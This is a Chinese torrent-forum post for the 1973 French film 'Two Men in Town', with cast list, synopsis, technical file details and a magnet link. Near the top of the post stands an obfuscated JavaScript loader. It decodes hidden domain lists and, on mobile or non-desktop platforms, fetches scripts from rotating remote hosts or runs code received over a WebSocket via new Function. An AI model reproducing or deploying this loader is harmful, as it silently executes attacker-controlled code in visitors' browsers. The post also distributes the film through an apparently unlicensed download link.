推上断头台[中文字幕].Two.Men.in.Town.1973.1080p.迅雷下载 5.96GB

版主小s 1月前 187

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 推上断头台 / 城里的两个男人 / Two Men in Town

◎片 名 Deux hommes dans la ville

◎年 代 1973

◎产 地 法国 / 意大利

◎类 别 剧情 / 犯罪

◎语 言 法语

◎上映日期 1989-07-15(中国大陆) / 1973-10-25(法国)

◎IMDb链接 https://www.imdb.com/title/tt0069967/

◎豆瓣评分 7.5/10 (190人评价)

◎豆瓣链接 https://movie.douban.com/subject/1869208/

◎片 长 USA: 100 分钟

◎导 演 何塞·乔凡尼 José Giovanni (id:1010027)

◎编 剧 何塞·乔凡尼 José Giovanni (id:1010027)

◎演 员 让·迦本 Jean Gabin (id:1048257)

阿兰·德龙 Alain Delon (id:1041174)

梅茜·珐玛 Mimsy Farmer (id:1032532)

维克多·朗努西 Victor Lanoux (id:1019451)

塞西尔·瓦索尔 Cécile Vassort (id:1159415)

拉里亚·奥科希尼 Ilaria Occhini (id:1134596)

圭多·阿尔贝蒂 Guido Alberti (id:1058756)

马尔卡·里博斯卡 Malka Ribowska (id:1145488)

克里斯蒂娜·法布雷加 Christine Fabréga (id:1090762)

热拉尔·德帕迪约 Gérard Depardieu (id:1013845)

罗贝尔·卡斯特尔 Robert Castel (id:1069948)

Albert Augier Albert Augier (id:1059803)

莫里斯·巴里埃 Maurice Barrier (id:1062815)

菲利普·萨德 Philippe Sarde (id:1018957)

Fran?oise Javet Fran?oise Javet (id:1287628)

Jean-Jacques Caziot Jean-Jacques Caziot (id:1280344)

◎标 签 法国 / 法国电影 / 犯罪 / AlainDelon / 阿兰·德龙 / 阿兰德隆 / 人性 / 阿兰·德隆

◎简 介

因抢劫罪被判十二年徒刑的吉诺(阿兰·德隆饰)刑满出狱,在社工热尔曼(让·加宾JeanGabin饰)的热心帮助和循循善诱下,他决心痛改前非,重新做人。但信奉“罪犯永远都是罪犯”的警长杰特勒(米歇尔·布盖MichelBouquet饰)却仍然不信任他,处处与他作对,最终逼得他走投无路,终于失控杀死了警长杰特勒。经过冷酷、教条的法庭的审讯后,吉诺最终被推上了断头台。

这是一部对专制暴政和断头台提出强烈控诉和谴责的人道主义电影,深沉的主题和场面常令观众陷入巨大的感情波澜之中。本片在巴黎及其近郊放映时,仅十周内观众人数就高达四十八万人次。1981年,密特朗总统上台后,通过了在法国取消死刑的新法令。

  1. General

  2. Unique ID : 193343928422352740705282457228878518079 (0x9174AFA64ED27A4C03BC73D3B86F973F)

  3. Complete name : Two.Men.in.Town.1973.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 5.96 GiB

  7. Duration : 1 h 38 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 8 639 kb/s

  10. Movie name : Two Men in Town 1973 1080p BluRay DTS x265-10bit-HDS

  11. Encoded date : UTC 2021-06-18 01:51:38

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 38 min

  21. Bit rate : 7 111 kb/s

  22. Width : 1 792 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 5:3

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.153

  31. Stream size : 4.90 GiB (82%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS XLL

  39. Format/Info : Digital Theater Systems

  40. Commercial name : DTS-HD Master Audio

  41. Codec ID : A_DTS

  42. Duration : 1 h 38 min

  43. Bit rate mode : Variable

  44. Bit rate : 1 513 kb/s

  45. Channel(s) : 2 channels

  46. Channel layout : L R

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossless

  51. Stream size : 1.04 GiB (18%)

  52. Title : French

  53. Language : French

  54. Default : Yes

  55. Forced : No


  56. Text

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 37 min

  63. Bit rate : 21.9 kb/s

  64. Count of elements : 1578

  65. Stream size : 15.2 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


TAGS 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:6C98848869EA1422692B879CDF6485F705A8E457
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回